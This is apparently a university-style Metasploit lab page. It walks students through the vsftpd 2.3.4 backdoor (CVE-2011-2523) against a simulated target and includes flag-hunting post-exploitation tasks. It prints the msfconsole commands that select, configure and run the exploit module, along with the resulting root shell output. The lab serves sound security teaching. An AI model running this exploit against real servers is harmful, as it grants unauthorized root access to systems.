// metasploit exploitation lab

Exploit the
vsftpd 2.3.4 Backdoor

Use the Metasploit Framework to identify, configure, and launch an exploit against a simulated vulnerable FTP server. Collect 8 flags through post-exploitation enumeration.

8
Flags
80
Points
2
Tiers
CVE
2011-2523
ℹ No Kali Linux Required
No Kali Linux installation is required to complete this lab and collect all 8 flags. The interactive shell simulator runs entirely in your browser on any device. The Metasploit commands shown in Tasks 1–3 are for conceptual learning so you understand what a real exploitation workflow looks like — you will practice running them in a live environment in a future lab.
🎯
Simulated Lab Target
10.10.10.50
⚠ This is a SIMULATED target — use the interactive terminal below. Do not scan real systems.
BACKGROUND
The vsftpd 2.3.4 Backdoor
In 2011, the vsftpd 2.3.4 source code was compromised. An attacker inserted a backdoor that triggers when a username ending in :) is sent during authentication. When triggered, the server opens a command shell on port 6200, granting the attacker root-level access without any credentials. This vulnerability is catalogued as CVE-2011-2523 and is one of the most well-known examples of a supply chain attack in open source software.
⚠ Important
The Metasploit module exploit/unix/ftp/vsftpd_234_backdoor automates this attack entirely. In this lab you will configure and fire this module against the simulated target using the interactive terminal below.
TASKS
Step-by-Step Instructions
🚀
Task 1 — Launch Metasploit & Search for the Exploit
Start msfconsole and find the vsftpd backdoor module
Step 1 — Start msfconsole on your Kali machine
Open a terminal on your Kali Linux machine and launch the Metasploit Framework console. This may take 30–60 seconds to initialize the database.
kali — bash
┌──(kali㉿kali)-[~]
└─$ msfconsole

=[ metasploit v6.x.x ]=
+ -- --=[ 2300+ exploits | 1200+ auxiliary | 400+ post ]
+ -- --=[ 950+ payloads | 50+ encoders | 11 nops ]

msf6 >
Step 2 — Search for the vsftpd exploit module
Use the search command to find all modules related to vsftpd. Metasploit will return any matching exploit, auxiliary, or post modules.
msfconsole
msf6 > search vsftpd

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Analysis Questions
Q1. What is the full module path for the vsftpd backdoor exploit? What does the rank "excellent" mean in Metasploit?
Q2. What year was CVE-2011-2523 disclosed? What type of attack inserted this backdoor into the vsftpd source code?
Task 2 — Configure the Exploit Module
Select the module and set required options
Step 1 — Select and inspect the module
msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s)
RPORT 21 yes The target port (TCP)
Step 2 — Set the target IP (RHOSTS)
RHOSTS is the Remote Host — the IP address of your target. Always verify you are pointing at the correct authorized target before running any exploit.
msfconsole
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.50
RHOSTS => 10.10.10.50

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

RHOSTS 10.10.10.50 yes The target host(s)
RPORT 21 yes The target port (TCP)
Analysis Questions
Q3. What does RHOSTS stand for and why is it required before running the exploit?
Q4. What is the default RPORT for this exploit and why does that make sense given the vulnerability?
💥
Task 3 — Launch the Exploit & Get a Shell
Fire the exploit and interact with the backdoor shell
Step 1 — Run the exploit
The run command (or exploit) fires the module. If successful, Metasploit connects to port 6200 on the target where the backdoor has opened a command shell.
msfconsole
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.50:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.50:21 - USER: 331 Please specify the password.
[+] 10.10.10.50:21 - Backdoor service has been spawned, handling...
[+] 10.10.10.50:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened

id
uid=0(root) gid=0(root) groups=0(root)
Step 2 — Use the interactive simulator below
✓ Exploit successful — shell opened on port 6200. Now use the Interactive Shell Simulator below to explore the target filesystem and collect your flags. Type commands exactly as you would in a real shell session.
Analysis Questions
Q5. What UID did the shell session open as? Why is this significant from an attacker's perspective?
Q6. What port does the vsftpd backdoor open when triggered? How does Metasploit connect to it?
SIMULATOR
Interactive Shell — Post-Exploitation
You have a root shell on the target. Use Linux commands to enumerate the system and find all 8 flags. Tier 1 flags are in obvious locations. Tier 2 flags require deeper enumeration. Type help to see available commands.
root@target:~# — session 1
LIVE SESSION
[*] Command shell session 1 opened (10.10.10.50:6200) [*] Connected as: uid=0(root) gid=0(root) Type 'help' to see available commands.
root@target:~#
Hint: Try ls · cat · cd · pwd · whoami · id · env · find · cat /etc/passwd · help
Post-Exploitation Analysis Questions
Q7. List the commands you used to find the Tier 2 flags. What made them harder to locate than Tier 1?
Q8. In a real penetration test, what would you do after obtaining a root shell? List at least 3 post-exploitation actions.

READY TO SUBMIT?

Head to the flag submission page to enter your collected flags,
track your score, and claim your completion badge.

🚩 SUBMIT FLAGS →
Metasploit Exploitation Lab  ·  Authorized use only  ·  © 2026
Created and hosted by Professor Salazar (2026)